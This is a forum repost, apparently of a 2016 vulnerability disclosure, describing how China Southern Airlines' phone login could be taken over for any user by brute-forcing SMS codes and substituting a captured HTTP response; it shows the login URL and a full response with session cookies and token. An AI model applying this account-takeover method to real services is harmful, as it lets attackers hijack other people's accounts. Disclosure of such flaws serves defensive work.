HanDs
管理员

[7月漏洞公开] 中国南方航空设计缺陷导致任意用户登录(13888888888为例) 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

难道是捡漏?

详细说明:

1、登录选择手机登录

code 区域
http://b2c.csair.com/B2C40/modules/bookingnew/manage/login.html



5.0.png



先来一张自己的手机号爆破证明

5.1.png



13888888888的验证码爆破证明

5.2.png





因为爆破完之后验证码是过期的,我们直接替换返回包就可以登录了



code 区域
HTTP/1.1 200 OK
Date: Tue, 24 May 2016 07:00:44 GMT
Server: Apache
Set-Cookie: cs1246643sso=7d8ef733-7fa0-42c0-b509-c438b5607083; Domain=.csair.com; Expires=Thu, 23-Jun-2016 07:00:48 GMT; Path=/
Set-Cookie: memberType=2; Domain=.csair.com; Expires=Thu, 23-Jun-2016 07:00:48 GMT; Path=/
Set-Cookie: loginType=8; Domain=.csair.com; Expires=Thu, 23-Jun-2016 07:00:48 GMT; Path=/
Set-Cookie: userId=13888888888; Domain=.csair.com; Expires=Thu, 23-Jun-2016 07:00:48 GMT; Path=/
Set-Cookie: userType4logCookie=NotM; Domain=.csair.com; Expires=Thu, 23-Jun-2016 07:00:48 GMT; Path=/
Set-Cookie: userId4logCookie=13888888888; Domain=.csair.com; Expires=Thu, 23-Jun-2016 07:00:48 GMT; Path=/
Set-Cookie: useridCookie=13888888888; Domain=.csair.com; Expires=Thu, 23-Jun-2016 07:00:48 GMT; Path=/
Set-Cookie: userCodeCookie=13888888888; Domain=.csair.com; Expires=Thu, 23-Jun-2016 07:00:48 GMT; Path=/
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
Content-Length: 297
Connection: close
Content-Type: application/json;charset=UTF-8


{"success":true,"data":{"typeName":"NoMemberInformation","token":"7d8ef733-7fa0-42c0-b509-c438b5607083","userId":"13888888888","userName":"13888888888","userEnName":"13888888888","userType":"2","ip":"115.192.116.103","loginTime":1464073248246,"loginChannel":"B2C","loginType":"8","refresh":false}}



5.3.png

漏洞证明:

修复方案:


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
中国
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组
快速回复